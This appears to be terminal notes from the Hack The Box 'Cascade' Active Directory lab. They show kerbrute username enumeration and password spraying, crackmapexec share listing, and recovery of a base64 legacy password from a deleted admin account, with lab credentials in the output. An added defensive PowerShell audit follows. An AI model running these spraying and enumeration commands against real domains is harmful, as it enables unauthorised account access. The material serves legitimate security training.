2026/05/06 19:35:00 > [+] VALID USERNAME: [email protected]
2026/05/06 19:35:00 > Done! Tested 15 usernames (11 valid) in 10.036 seconds
┌─[eu-dedivip-4]─[10.10.15.199]─[iamdayone@htb-ry9shcrlcd]─[~]
└──╼ [★]$ ./kerbrute passwordspray -d cascade.local --dc 10.129.29.246 valid_names.txt "rY4n5eva"
Version: v1.0.3 (9dad6e1) - 05/06/26 - Ronnie Flathers @ropnop
2026/05/06 20:22:23 > Using KDC(s):
2026/05/06 20:22:23 > 10.129.29.246:88
2026/05/06 20:22:36 > [+] VALID LOGIN: [email protected]:rY4n5eva
2026/05/06 20:22:43 > Done! Tested 11 logins (1 successes) in 20.084 seconds
┌─[eu-dedivip-4]─[10.10.15.199]─[iamdayone@htb-ry9shcrlcd]─[~]
└──╼ [★]$ crackmapexec smb 10.129.29.246 -u 'r.thompson' -p 'rY4n5eva' --shares
SMB 10.129.29.246 445 CASC-DC1 [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:CASC-DC1) (domain:cascade.local) (signing:True) (SMBv1:False)
SMB 10.129.29.246 445 CASC-DC1 [+] cascade.local\r.thompson:rY4n5eva
SMB 10.129.29.246 445 CASC-DC1 [*] Enumerated shares
SMB 10.129.29.246 445 CASC-DC1 Share Permissions Remark
SMB 10.129.29.246 445 CASC-DC1 ----- ----------- ------
SMB 10.129.29.246 445 CASC-DC1 ADMIN$ Remote Admin
SMB 10.129.29.246 445 CASC-DC1 Audit$
SMB 10.129.29.246 445 CASC-DC1 C$ Default share
SMB 10.129.29.246 445 CASC-DC1 Data READ
SMB 10.129.29.246 445 CASC-DC1 IPC$ Remote IPC
SMB 10.129.29.246 445 CASC-DC1 NETLOGON READ Logon server share
SMB 10.129.29.246 445 CASC-DC1 print$ READ Printer Drivers
SMB 10.129.29.246 445 CASC-DC1 SYSVOL READ Logon server share
┌─[eu-dedivip-4]─[10.10.15.199]─[iamdayone@htb-ry9shcrlcd]─[~]
└──╼ [★]$ ./kerbrute passwordspray -d cascade.local --dc 10.129.29.246 valid_names.txt "sT333ve2"
Version: v1.0.3 (9dad6e1) - 05/06/26 - Ronnie Flathers @ropnop
2026/05/06 21:18:27 > Using KDC(s):
2026/05/06 21:18:27 > 10.129.29.246:88
2026/05/06 21:18:37 > [+] VALID LOGIN: [email protected]:sT333ve2
2026/05/06 21:18:47 > Done! Tested 11 logins (1 successes) in 20.096 seconds
PS C:\Users\arksvc\Documents> Get-ADObject -Filter 'isDeleted -eq $true -and name -like "*TempAdmin*"' -IncludeDeletedObjects -Properties *
accountExpires : 9223372036854775807
badPasswordTime : 0
badPwdCount : 0
CanonicalName : cascade.local/Deleted Objects/TempAdmin DEL:f0cc344d-31e0-4866-bceb-a842791ca059
cascadeLegacyPwd : YmFDVDNyMWFOMDBkbGVz
CN : TempAdmin DEL:f0cc344d-31e0-4866-bceb-a842791ca059
codePage : 0
countryCode : 0
Created : 1/27/2020 3:23:08 AM
createTimeStamp : 1/27/2020 3:23:08 AM
Deleted : True
Description :
DisplayName : TempAdmin
DistinguishedName : CN=TempAdmin\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,DC=cascade,DC=local
dSCorePropagationData : {1/27/2020 3:23:08 AM, 1/1/1601 12:00:00 AM}
givenName : TempAdmin
instanceType : 4
isDeleted : True
LastKnownParent : OU=Users,OU=UK,DC=cascade,DC=local
lastLogoff : 0
lastLogon : 0
logonCount : 0
Modified : 1/27/2020 3:24:34 AM
modifyTimeStamp : 1/27/2020 3:24:34 AM
msDS-LastKnownRDN : TempAdmin
Name : TempAdmin DEL:f0cc344d-31e0-4866-bceb-a842791ca059
nTSecurityDescriptor : System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory :
ObjectClass : user
ObjectGUID : f0cc344d-31e0-4866-bceb-a842791ca059
objectSid : S-1-5-21-3332504370-1206983947-1165150453-1136
primaryGroupID : 513
ProtectedFromAccidentalDeletion : False
pwdLastSet : 132245689883479503
sAMAccountName : TempAdmin
sDRightsEffective : 0
userAccountControl : 66048
userPrincipalName : [email protected]
uSNChanged : 237705
uSNCreated : 237695
whenChanged : 1/27/2020 3:24:34 AM
whenCreated : 1/27/2020 3:23:08 AM
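The Get-ADObject query above pulls one specific tombstoned account out of the Recycle Bin. As an added audit (not the walkthrough's own code), the PowerShell below generalises it to every object, live or deleted, that still carries the custom cascadeLegacyPwd attribute, and dry-runs clearing it. It assumes the ActiveDirectory RSAT module and a context able to read CN=Deleted Objects, as arksvc could; the function names are mine.

```powershell
# Added audit example, not part of the walkthrough. Finds every directory
# object, live or tombstoned, that still holds the custom 'cascadeLegacyPwd'
# attribute, so the attribute can be cleared and the tombstones reviewed.
# Assumes the ActiveDirectory RSAT module and read access to CN=Deleted Objects.
Import-Module ActiveDirectory

function Find-LegacyPwdObjects {
    param(
        # Attribute name taken from the walkthrough's output; change it for
        # any other home-grown "legacy password" attribute.
        [string]$Attribute = 'cascadeLegacyPwd'
    )

    # -IncludeDeletedObjects extends the search into CN=Deleted Objects, where
    # TempAdmin was recovered from. Tombstones keep this attribute only while
    # the Recycle Bin is enabled and the deleted-object lifetime has not expired.
    $filter = "$Attribute -like '*'"
    Get-ADObject -Filter $filter -IncludeDeletedObjects `
        -Properties $Attribute, isDeleted, sAMAccountName, whenChanged, LastKnownParent |
        ForEach-Object {
            $value = [string]$_.$Attribute
            [pscustomobject]@{
                Account           = $_.sAMAccountName
                DistinguishedName = $_.DistinguishedName
                Deleted           = [bool]$_.isDeleted
                LastChanged       = $_.whenChanged
                ValueLength       = $value.Length
                # The walkthrough's values were plain base64, i.e. a reversible
                # encoding rather than a hash. Flag that shape without decoding it.
                LooksBase64       = $value -match '^[A-Za-z0-9+/]+={0,2}$'
            }
        }
}

function Clear-LegacyPwdAttribute {
    param(
        [Parameter(Mandatory, ValueFromPipeline)] $Finding,
        [string]$Attribute = 'cascadeLegacyPwd',
        # Defaults to a dry run (-WhatIf); pass -Commit to actually clear it.
        [switch]$Commit
    )
    process {
        if ($Finding.Deleted) {
            # A tombstone's attributes cannot be cleared with Set-ADObject; it ages
            # out after the deleted-object lifetime, so record it for that review.
            Write-Warning ("Deleted object still holds {0}: {1}" -f $Attribute, $Finding.DistinguishedName)
            return
        }
        Set-ADObject -Identity $Finding.DistinguishedName -Clear $Attribute -WhatIf:(-not $Commit)
    }
}

# Report the findings, then dry-run the cleanup on the live objects.
$findings = Find-LegacyPwdObjects
$findings | Format-Table Account, Deleted, LastChanged, ValueLength, LooksBase64 -AutoSize
$findings | Clear-LegacyPwdAttribute
```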
- This AD machine
- Domain: cascade.local